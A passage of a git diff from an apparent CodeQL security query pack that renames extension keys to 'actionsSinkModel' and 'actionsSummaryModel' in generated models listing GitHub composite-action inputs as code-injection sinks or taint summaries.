b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 97a3bfa026e..a67aeb90595 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 81672e85557..1f5dd108f91 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b4fdfaf273d..ea4a2a2a3c7 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 6f1043073d8..29973ccdbd7 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index f9244c44858..2db70ffea66 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 36332c5678d..8a4273e8caf 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index c246e5de06f..de09b35f1d4 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 13c0093fe4a..91e6268e614 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 49b226de1e8..777212d9a0a 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 9a6e0b88ba2..8cc0ab83a42 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 4f88855a561..f1244bdd5de 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 5683d28567f..37814510c8c 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 424c7241bcf..48e40c36bea 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 37295f2cf6c..0edb2c5f8cd 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index e7c767d2dce..61210d17abb 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 7f78690f639..22dc1a40629 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index ba1beace170..b2888b571a8 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index 63085c045d0..bc188d91f1b 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d6ee6c8bb7d..d5defe67401 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 83951f43c63..d97fedbed13 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 397ab083809..e22c29b09f1 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 023abac3631..7203bb8345c 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 5dd069df499..dcfbb0ea203 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 1a1d763d6e4..6c5d6edd572 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index a8e95d30457..fdaee61066e 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 52d085ee479..d68c4e57c8a 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 33c56a67cb9..85a8d2f4d65 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 258101eecea..d2275409278 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index d77e05c680b..4dc0b87214b 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index db98f8d769a..ea1a8a8afec 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 7607840dbdc..5ce00c29e52 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 2fa4f8dfa61..d1f551b66da 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 80725157e33..6f8845ec1c0 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 9d317f14272..152fdfed447 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 12deff387bd..5919ade7e81 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 9c3c242b1ed..d9afa5bb21f 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 4aa1ce5c4cf..0b36853a891 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 6f8ef16ea33..2bd521d42f5 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bc2146921ef..8ae81e706a4 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 37e1d0d67a5..4893772b71a 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index eabd3834b1b..e174c830a85 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 2253e33b950..14070215bfa 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index bc1eb54056a..f3a0b47f2c2 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 842240cfaa2..12011d64396 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 8ff5ee1e2c0..40ecb17610e 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 29c5f793fb2..250606588f9 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 2f12293df0e..f2f5678b8b8 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 83012e51335..b17eb01f821 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 8ca21196194..7ebdde766f3 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f19fd1f6a6..7f2e1588139 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] - ["github/codeql-action", "*", "input.major_version", 